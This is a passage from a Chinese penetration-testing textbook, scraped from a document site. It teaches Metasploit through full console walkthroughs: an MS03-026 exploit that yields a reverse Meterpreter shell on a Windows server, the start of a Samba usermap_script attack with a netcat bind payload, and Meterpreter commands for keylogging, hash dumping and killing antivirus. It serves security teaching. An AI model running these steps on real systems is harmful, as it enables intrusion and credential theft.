




版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
第6章
網(wǎng)絡(luò)安全滲透測(cè)試技術(shù)編著:
秦?zé)鰟诖浣?/p>
任務(wù)6.4.2通過(guò)命令行界面對(duì)服務(wù)器實(shí)施滲透測(cè)試
任務(wù)6.4.2通過(guò)命令行界面對(duì)服務(wù)器實(shí)施滲透測(cè)試
除了圖形界面,還可使用命令行界面的Metasploit框架版(TheMetasploitFramework,簡(jiǎn)稱MSF),Metasploit框架版可以針對(duì)目標(biāo)的漏洞,提供相應(yīng)的發(fā)射器和惡意代碼。攻擊者采用發(fā)射器,可將惡意代碼發(fā)射到目標(biāo)主機(jī)上并隱蔽起來(lái),惡意代碼可接受攻擊者的控制。一、Metasploit涉及的一些概念vulnerability:被攻擊主機(jī)上的漏洞、薄弱點(diǎn)。exploit:用于發(fā)射惡意代碼的發(fā)射器。利用被攻擊者的漏洞和弱點(diǎn),發(fā)射器可將木馬等惡意代碼植入到被攻擊者主機(jī)。payload:是攻擊者用發(fā)射器發(fā)射并隱藏到被攻擊者主機(jī)內(nèi)惡意代碼,如木馬等。利用被攻擊者主機(jī)上的漏洞,攻擊者可使用exploit發(fā)射器發(fā)射惡意代碼payload,將惡意代碼payload發(fā)射到攻擊者的主機(jī),隱蔽的植入到被攻擊者主機(jī)內(nèi)部。Metasploit擁有大量?jī)?yōu)秀的、在線更新的exploit和paylaod。其中,Meterpreter是眾多載荷中最受歡迎的payload。二、Metasploit框架結(jié)構(gòu)MSF的操作步驟。一)針對(duì)被攻擊者主機(jī)的漏洞,選擇用于發(fā)射惡意代碼的發(fā)射器exploit。1.search:查看可用的發(fā)射器exploits。2.use:選用合適的發(fā)射器exploits。二)選用攻擊載荷payload(如木馬等惡意代碼),并設(shè)置相關(guān)參數(shù)。1.showpayloads:查看所有可選的攻擊載荷(惡意代碼)。2.setpayload:從大量的攻擊載荷payloads中,選擇一個(gè),一般選用Meterpreter作為攻擊載荷。3.showoptions:查看攻擊載荷的配置選項(xiàng)。4.set:設(shè)置攻擊載荷的配置選項(xiàng)、設(shè)置相關(guān)參數(shù)。三)查看適用的操作系統(tǒng)1.showtargets:查看所選的發(fā)射器和攻擊載荷適用的操作系統(tǒng)及版本,如果與被攻擊者的不符,則無(wú)法實(shí)施攻擊。2.settarget設(shè)置攻擊的操作系統(tǒng)。四)實(shí)施攻擊exploit:使用選好的發(fā)射器exploit和攻擊載荷payload,執(zhí)行滲透測(cè)試攻擊,效果和run一樣。參數(shù)–j表示攻擊在后臺(tái)進(jìn)行。以上是完整的步驟,根據(jù)實(shí)際情況,操作中可以省去其中某些步驟。三、攻擊載荷Meterpreter常用命令Meterpreter是最常用的攻擊載荷,其常用的命令如下:1.background回到后臺(tái),即上一個(gè)命令提示符。2.sessions每個(gè)攻擊為一個(gè)會(huì)話,每個(gè)會(huì)話有一個(gè)唯一的ID,使用sessions命令可查看當(dāng)前有哪些會(huì)話,即有哪些主機(jī)被控制了。使用session-h命令可查看幫助信息。使用sessionsID命令可切換到指定的session會(huì)話。使用session-kID命令可關(guān)閉指定的session會(huì)話。3.screenshot對(duì)被攻擊主機(jī)截屏,保存到本地。4.sysinfo顯示被攻擊主機(jī)的系統(tǒng)信息。5.ps查看被攻擊主機(jī)正在運(yùn)行的進(jìn)程。6.migrate將meterpreter遷移到相對(duì)穩(wěn)定的進(jìn)程中。7.runkeylogrecorder鍵盤記錄8.runhashdump收集被攻擊者主機(jī)的密碼哈希值9.runvnc打開被攻擊者主機(jī)的桌面10.runkillav關(guān)閉被攻擊者主機(jī)的殺毒軟件。四、對(duì)Windows服務(wù)器實(shí)施MS03-026漏洞攻擊上一小節(jié),我們通過(guò)Nessus掃描到了Windows服務(wù)器存在MS03-026漏洞。下面學(xué)習(xí)如何針對(duì)該已知漏洞,用命令行界面對(duì)目標(biāo)系統(tǒng)實(shí)施滲透測(cè)試攻擊。1.打開命令行界面,輸入msfconsole命令。root@kali:~/Downloads#msfconsole2.輸入searchms03-026命令,查找針對(duì)漏洞ms03-026的exploit發(fā)射器。msf>searchms03-026[!]Moduledatabasecachenotbuiltyet,usingslowsearchMatchingModules================NameDisclosureDateRankDescription-----------------------------------exploit/windows/dcerpc/ms03_026_dcom2003-07-16greatMS03-026MicrosoftRPCDCOMInterfaceOverflow查找到針對(duì)該漏洞的發(fā)射器:exploit/windows/dcerpc/ms03_026_dcom3.通過(guò)useexploit/windows/dcerpc/ms03_026_dcom命令,選用該exploit發(fā)射器。msf>useexploit/windows/dcerpc/ms03_026_dcom4.通過(guò)showpayloads命令,查看所有可選的攻擊載荷payload(惡意代碼)。msfexploit(windows/dcerpc/ms03_026_dcom)>showpayloads可以看到,可用的payload攻擊載荷很多。其中,windows/meterpreter/bind_tcp是kali主動(dòng)聯(lián)系被攻擊者,如果要經(jīng)過(guò)防火墻,易被過(guò)濾掉,不容易成功;我們將采用windows/meterpreter/reverse_tcp,此時(shí),受害者將主動(dòng)聯(lián)系kali,防火墻一般會(huì)放行。5.將“windows/meterpreter/reverse_tcp”選為攻擊載荷。msfexploit(windows/dcerpc/ms03_026_dcom)>setpayloadwindows/meterpreter/reverse_tcppayload=>windows/meterpreter/reverse_tcp6.通過(guò)showoptions命令,查看攻擊載荷payload的配置選項(xiàng)。msfexploit(windows/dcerpc/ms03_026_dcom)>showoptionsModuleoptions(exploit/windows/dcerpc/ms03_026_dcom):NameCurrentSettingRequiredDescription--------------------------------------RHOSTyesThetargetaddressRPORT135yesThetargetport(TCP)Payloadoptions(windows/meterpreter/reverse_tcp):NameCurrentSettingRequiredDescription--------------------------------------EXITFUNCthreadyesExittechnique(Accepted:'',seh,thread,process,none)LHOSTyesThelistenaddressLPORT4444yesThelistenportExploittarget:IdName------0WindowsNTSP3-6a/2000/XP/2003Universal7.set:設(shè)置攻擊載荷的配置選項(xiàng)、設(shè)置相關(guān)參數(shù)。msfexploit(windows/dcerpc/ms03_026_dcom)>setrhost3rhost=>3msfexploit(windows/dcerpc/ms03_026_dcom)>setlhost1lhost=>1三)查看適用的操作系統(tǒng)1.showtargets:查看所選的發(fā)射器和攻擊載荷適用的操作系統(tǒng)及版本,如果與被攻擊者的不符,則無(wú)法實(shí)施攻擊。msfexploit(windows/dcerpc/ms03_026_dcom)>showtargetsExploittargets:IdName------0WindowsNTSP3-6a/2000/XP/2003Universal可見,ID號(hào)為0的target,適用的目標(biāo)操作系統(tǒng)及版本為WindowsNTSP3-6a/2000/XP/2003Universal。2.選用目標(biāo)操作系統(tǒng)對(duì)應(yīng)的ID號(hào)為0。msfexploit(windows/dcerpc/ms03_026_dcom)>settarget0target=>0四)實(shí)施攻擊1.exploit:使用選好的發(fā)射器exploit和攻擊載荷payload,執(zhí)行滲透測(cè)試攻擊。msfexploit(windows/dcerpc/ms03_026_dcom)>exploit[*]StartedreverseTCPhandleron1:4444[*]3:135-TryingtargetWindowsNTSP3-6a/2000/XP/2003Universal...[*]3:135-Bindingto4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:3[135]...[*]3:135-Boundto4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:3[135]...[*]3:135-Sendingexploit...[*]Sendingstage(179779bytes)to3[*]Sleepingbeforehandlingstage...[*]Meterpretersession1opened(1:4444->3:3177)at2018-12-3020:26:40-0500meterpreter>可以看到,攻擊成功,payload被發(fā)射到目標(biāo)系統(tǒng)中。五)操控被攻擊服務(wù)器1.查看被攻擊服務(wù)器的信息meterpreter>sysinfoComputer:ROOT-TVI862UBEHOS:Windows.NETServer(Build3790).Architecture:x86SystemLanguage:en_USDomain:WORKGROUPLoggedOnUsers:2Meterpreter:x86/windows2.進(jìn)入被攻擊服務(wù)器的命令行界面meterpreter>shellProcess2396created.Channel1created.MicrosoftWindows[Version5.2.3790](C)Copyright1985-2003MicrosoftCorp.3.執(zhí)行命令,操控被攻擊主機(jī),如執(zhí)行ipconfig等命令。C:\WINDOWS\system32>ipconfigipconfigWindowsIPConfigurationEthernetadapterLocalAreaConnection:Connection-specificDNSSuffix.:IPAddress............:3SubnetMask...........:DefaultGateway.........:C:\WINDOWS\system32>4.退出被攻擊主機(jī)的命令行界面C:\WINDOWS\system32>^CTerminatechannel1?[y/N]ymeterpreter>5.執(zhí)行backgroud命令,回到后臺(tái),即上一個(gè)命令提示符。meterpreter>background[*]Backgroundingsession1...6.查看當(dāng)前sessions會(huì)話msfexploit(windows/dcerpc/ms03_026_dcom)>sessionsActivesessions===============IdNameTypeInformationConnection-------------------------------1meterpreterx86/windowsNTAUTHORITY\SYSTEM@ROOT-TVI862UBEH1:4444->3:3177(3)可以看到,目前只有一個(gè)會(huì)話,ID是1,被控制的目標(biāo)服務(wù)器是3。五、對(duì)Linux服務(wù)器實(shí)施samba漏洞攻擊1.打開命令行界面,輸入msfconsole命令。root@kali:~#msfconsole2.使用search命令從metasploit的滲透代碼庫(kù)中查找攻擊samba服務(wù)的exploit發(fā)射器。msf>searchsambaMatchingModules================NameDisclosureDateRankDescription----------------------------------……省略部分輸出……exploit/multi/samba/usermap_script2007-05-14excellentSamba"usernamemapscript"CommandExecution……省略部分輸出……我們從顯示的結(jié)果中,選擇exploit/multi/samba/usermap_script作為發(fā)射器。3.通過(guò)useexploit/multi/samba/usermap_script命令,選用該exploit發(fā)射器。msf>useexploit/multi/samba/usermap_scriptmsfexploit(multi/samba/usermap_script)>4.通過(guò)showpayloads命令,查看所有可選的攻擊載荷payload(惡意代碼)。msfexploit(multi/samba/usermap_script)>showpayloads在列出的眾多攻擊載荷中,我們選擇cmd/unix/bind_netcat。5.將“cmd/unix/bind_netcat”選為攻擊載荷。msfexploit(multi/samba/usermap_script)>setpayloadcmd/unix/bind_netcatpayload=>cmd/unix/bind_netcat6.通過(guò)showoptions命令,查看攻擊載荷(payload)的配置選項(xiàng)。msfexploit(multi/samba/usermap_script)>showoptionsModuleoptions(exploit/multi/samba/usermap_script):NameCurrentSettingRequiredDescription-----------------------------------
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025至2030年中國(guó)離心式吹風(fēng)機(jī)行業(yè)發(fā)展研究報(bào)告
- 2025至2030年中國(guó)磺鎵燈曬版機(jī)行業(yè)投資前景及策略咨詢報(bào)告
- 2025至2030年中國(guó)磁性取釘器市場(chǎng)現(xiàn)狀分析及前景預(yù)測(cè)報(bào)告
- 2025至2030年中國(guó)直繡針市場(chǎng)調(diào)查研究報(bào)告
- 2025至2030年中國(guó)直流無(wú)刷電動(dòng)機(jī)數(shù)據(jù)監(jiān)測(cè)研究報(bào)告
- 2024年國(guó)網(wǎng)遼寧省電力有限公司招聘高校畢業(yè)生(第一批)考試筆試參考題庫(kù)附帶答案詳解
- 2024年國(guó)網(wǎng)綜合能源服務(wù)集團(tuán)有限公司高校畢業(yè)生(第一批)筆試參考題庫(kù)附帶答案詳解
- 2024年國(guó)網(wǎng)北京市電力公司高校畢業(yè)生招聘考試(第一批)筆試參考題庫(kù)附帶答案詳解
- 2024年國(guó)網(wǎng)冀北電力有限公司招聘高校畢業(yè)生170人(第二批)筆試參考題庫(kù)附帶答案詳解
- 2024年國(guó)家能源集團(tuán)置業(yè)有限公司集團(tuán)系統(tǒng)內(nèi)公開招聘25人筆試參考題庫(kù)附帶答案詳解
- 觸電傷害事故安全教育
- 幼兒園大班綜合《我們和手機(jī)》課件
- 幾內(nèi)亞共和國(guó)《礦產(chǎn)法》
- 食堂食品加工流程圖
- 數(shù)據(jù)結(jié)構(gòu)ppt課件完整版
- 物理講義納米光子學(xué)
- 專利檢索ppt課件(PPT 54頁(yè))
- GB∕T 2099.1-2021 家用和類似用途插頭插座 第1部分:通用要求
- 中考英語(yǔ)寫作指導(dǎo)課件(共41張PPT)
- 建筑立面十八式,你用過(guò)幾個(gè)?
- 三只小豬的真實(shí)故事
評(píng)論
0/150
提交評(píng)論